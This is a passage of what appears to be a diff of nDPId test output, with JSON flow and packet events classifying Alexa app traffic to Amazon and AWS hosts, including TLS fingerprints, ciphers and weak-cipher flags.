{"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +01072{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1327,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976089426,"flow_last_seen":1490976090196,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":996,"flow_tot_l4_payload_len":996,"flow_avg_l4_payload_len":249,"midstream":0,"thread_ts_msec":1490976090196,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49630,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"},"http": {"hostname":"alexa.amazon.com","url":"alexa.amazon.com\/lib\/bootstrap\/img\/glyphicons-halflings.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36 PitanguiBridge\/1.16.4.5-[MANUFACTURER=LGE][RELEASE=5.1.1][BRAND=lge][SDK=22][MODEL=LGLS751]"}} +01021{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1343,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976089239,"flow_last_seen":1490976090313,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976090313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45715,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} +01021{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1345,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976088958,"flow_last_seen":1490976090313,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1490976090313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45712,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} +01021{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1346,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976089227,"flow_last_seen":1490976090313,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976090313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45714,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1389,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976090572,"flow_last_seen":1490976090572,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976090572,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34069,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1389,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":94,"flow_packet_id":1,"flow_last_seen":1490976090572,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976090572,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8o8xAAEAGcF6sECrYNu8YuoUVAbs6msJ9AAAAAKAC\/\/863gAAAgQFtAQCCAoA9mGxAAAAAAEDAwg="} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1396,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":94,"flow_packet_id":2,"flow_last_seen":1490976090753,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976090753,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwZiVAAOcGBxE27xi6rBAq2AG7hRXpU+crOprCfnASH\/7pEAAAAgQFtAEDAwY="} 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1400,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":94,"flow_packet_id":3,"flow_last_seen":1490976090756,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976090756,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoo81AAEAGcHGsECrYNu8YuoUVAbs6msJ+6VPnLFAQAVczggAA"} -00883{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1401,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976090572,"flow_last_seen":1490976090757,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":259,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976090757,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34069,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00883{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1401,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976090572,"flow_last_seen":1490976090757,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":259,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976090757,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34069,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1409,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976090796,"flow_last_seen":1490976090796,"flow_idle_time":200000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":45,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1490976090796,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":35726,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1409,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":95,"flow_packet_id":1,"flow_last_seen":1490976090796,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":87,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":87,"pkt_l4_len":53,"thread_ts_msec":1490976090796,"pkt":"AMDKkaPvePiC0\/vCCABFAABJWlpAAEARM1CsECrYrBAqAYuOADUANbcep0QBAAABAAAAAAAADXMzLWV4dGVybmFsLTIJYW1hem9uYXdzA2NvbQAAAQAB"} -00793{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1409,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976090796,"flow_last_seen":1490976090796,"flow_idle_time":200000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":45,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1490976090796,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":35726,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"dns": {"query":"s3-external-2.amazonaws.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00937{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1412,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976090572,"flow_last_seen":1490976090959,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":415,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976090959,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34069,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"d199ba0af2b08e204c73d6d81a1fd260","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +00793{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1409,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976090796,"flow_last_seen":1490976090796,"flow_idle_time":200000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":45,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1490976090796,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":35726,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"dns": {"query":"s3-external-2.amazonaws.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00937{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1412,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976090572,"flow_last_seen":1490976090959,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":415,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976090959,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34069,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"d199ba0af2b08e204c73d6d81a1fd260","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} 00562{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1424,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":95,"flow_packet_id":2,"flow_last_seen":1490976090982,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":131,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":131,"pkt_l4_len":97,"thread_ts_msec":1490976090982,"pkt":"ePiC0\/vCAMDKkaPvCABFAAB13VlAAEARsCSsECoBrBAq2AA1i44AYd1op0SBgAABAAIAAAAADXMzLWV4dGVybmFsLTIJYW1hem9uYXdzA2NvbQAAAQABwAwABQABAAAADgAQDXMzLWV4dGVybmFsLTHAGsA5AAEAAQAAAAQABDbnSFg="} -00807{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1424,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976090796,"flow_last_seen":1490976090982,"flow_idle_time":200000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":89,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1490976090982,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":35726,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"dns": {"query":"s3-external-2.amazonaws.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"54.231.72.88"}} +00807{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1424,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976090796,"flow_last_seen":1490976090982,"flow_idle_time":200000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":89,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1490976090982,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":35726,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"dns": {"query":"s3-external-2.amazonaws.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"54.231.72.88"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1425,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976090991,"flow_last_seen":1490976090991,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976090991,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.231.72.88","src_port":41820,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1425,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":96,"flow_packet_id":1,"flow_last_seen":1490976090991,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976090991,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8byFAAEAGdXOsECrYNudIWKNcAbsQFQ76AAAAAKAC\/\/\/K3wAAAgQFtAQCCAoA9mHbAAAAAAEDAwg="} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1438,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976091048,"flow_last_seen":1490976091048,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976091048,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.231.72.88","src_port":41821,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1438,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":97,"flow_packet_id":1,"flow_last_seen":1490976091048,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976091048,"pkt":"AMDKkaPvePiC0\/vCCABFAAA80ahAAEAGEuysECrYNudIWKNdAbtkFLBIAAAAAKAC\/\/\/ViwAAAgQFtAQCCAoA9mHgAAAAAAEDAwg="} 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1441,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":96,"flow_packet_id":2,"flow_last_seen":1490976091160,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976091160,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA0KVkAACcGFEQ250hYrBAq2AG7o1w0YmduEBUO+4AS\/\/+yAwAAAgQFmAMDCAEEAgEB"} 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1442,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":96,"flow_packet_id":3,"flow_last_seen":1490976091163,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976091163,"pkt":"AMDKkaPvePiC0\/vCCABFAAAobyJAAEAGdYasECrYNudIWKNcAbsQFQ77NGJnb1AQAVf4XAAA"} -00870{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1443,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976090991,"flow_last_seen":1490976091163,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1490976091163,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.231.72.88","src_port":41820,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s3-external-2.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00870{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1443,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976090991,"flow_last_seen":1490976091163,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1490976091163,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.231.72.88","src_port":41820,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s3-external-2.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1449,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":97,"flow_packet_id":2,"flow_last_seen":1490976091217,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976091217,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA0Sq8AACcG8u0250hYrBAq2AG7o117lZ8zZBSwSYAS\/\/89vAAAAgQFmAMDCAEEAgEB"} 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1450,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":97,"flow_packet_id":3,"flow_last_seen":1490976091219,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976091219,"pkt":"AMDKkaPvePiC0\/vCCABFAAAo0alAAEAGEv+sECrYNudIWKNdAbtkFLBJe5WfNFAQAVeEFQAA"} -00924{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1454,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976090991,"flow_last_seen":1490976091345,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1490976091345,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.231.72.88","src_port":41820,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s3-external-2.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"ea615e28cb25adfb2f261151eab3314f","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01339{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1456,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976090991,"flow_last_seen":1490976091346,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1432,"flow_tot_l4_payload_len":2942,"flow_avg_l4_payload_len":367,"midstream":0,"thread_ts_msec":1490976091346,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.231.72.88","src_port":41820,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s3-external-2.amazonaws.com","server_names":"s3-external-1.amazonaws.com,*.s3-external-1.amazonaws.com,s3-external-2.amazonaws.com,*.s3-external-2.amazonaws.com,*.s3.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"ea615e28cb25adfb2f261151eab3314f","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert Baltimore CA-2 G2","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com Inc., CN=*.s3-external-1.amazonaws.com","alpn":"h2,http\/1.1","fingerprint":"C0:51:D8:FA:6B:58:94:F2:3E:4E:7D:B2:36:5F:02:E4:F0:3F:54:FF"}} +00924{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1454,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976090991,"flow_last_seen":1490976091345,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1490976091345,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.231.72.88","src_port":41820,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s3-external-2.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"ea615e28cb25adfb2f261151eab3314f","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01339{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1456,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976090991,"flow_last_seen":1490976091346,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1432,"flow_tot_l4_payload_len":2942,"flow_avg_l4_payload_len":367,"midstream":0,"thread_ts_msec":1490976091346,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.231.72.88","src_port":41820,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s3-external-2.amazonaws.com","server_names":"s3-external-1.amazonaws.com,*.s3-external-1.amazonaws.com,s3-external-2.amazonaws.com,*.s3-external-2.amazonaws.com,*.s3.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"ea615e28cb25adfb2f261151eab3314f","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert Baltimore CA-2 G2","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com Inc., CN=*.s3-external-1.amazonaws.com","alpn":"h2,http\/1.1","fingerprint":"C0:51:D8:FA:6B:58:94:F2:3E:4E:7D:B2:36:5F:02:E4:F0:3F:54:FF"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1492,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976093238,"flow_last_seen":1490976093238,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1490976093238,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":41639,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 